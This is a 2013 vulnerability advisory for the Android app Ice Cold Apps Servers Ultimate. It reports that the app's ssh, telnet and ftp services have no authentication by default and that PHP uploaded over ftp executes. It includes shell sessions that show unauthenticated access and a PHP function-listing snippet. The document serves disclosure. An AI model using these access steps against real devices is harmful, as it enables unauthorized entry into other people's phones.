Multiple vulnerabilities in Ice Cold Apps Servers Ulitmate Version 6.0.2(12) for Android

9/8/13
Larry W. Cashdollar, @_larry0

http://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647

http://www.icecoldapps.com

Vulnerabilities

There are no credentials by default, authentication is disabled for telnet/ssh/ftp allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.

	• ftp server allows writes to lighttp/php* directory.
	• telnet default authentication turned off.
	• ssh server default authentication turned off.
	• Anonymous SOCKS proxy & http/ftp proxy.
SSHD

larry$ ssh 192.168.0.29 -p 2222
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $ uptime
up time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00 $

Telnet

larry$ telnet 192.168.0.29 2323
Trying 192.168.0.29...
Connected to 192.168.0.29.
Escape character is '^]'.

Welcome to tel!
Please enter some text to test the connection and hit enter:

$
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $

lighttpd / PHP server

	• php has the following functions available:
Via
<?php

        $arr = get_defined_functions();
        echo "<pre>";
                print_r($arr);
        echo "</pre>";

?>

Returned 1300 functions, including exec, pass_thru system() and

            [662] => socket_select
            [663] => socket_create
            [664] => socket_create_listen
            [665] => socket_create_pair
            [666] => socket_accept
            [667] => socket_set_nonblock
            [668] => socket_set_block
            [669] => socket_listen
            [670] => socket_close
            [671] => socket_write
            [672] => socket_read
            [673] => socket_getsockname
            [674] => socket_getpeername
            [675] => socket_connect
            [676] => socket_strerror
            [677] => socket_bind
            [678] => socket_recv
            [679] => socket_send
            [680] => socket_recvfrom
            [681] => socket_sendto
            [682] => socket_get_option
            [683] => socket_set_option
            [684] => socket_shutdown
            [685] => socket_last_error
            [686] => socket_clear_error
            [687] => socket_import_stream
            [688] => socket_getopt
            [689] => socket_setopt


Vendor Notified: 9/10/2013

The full list is here:

http://vapid.dhs.org/advisories/ultimate-server-android-vulns.html

-- Larry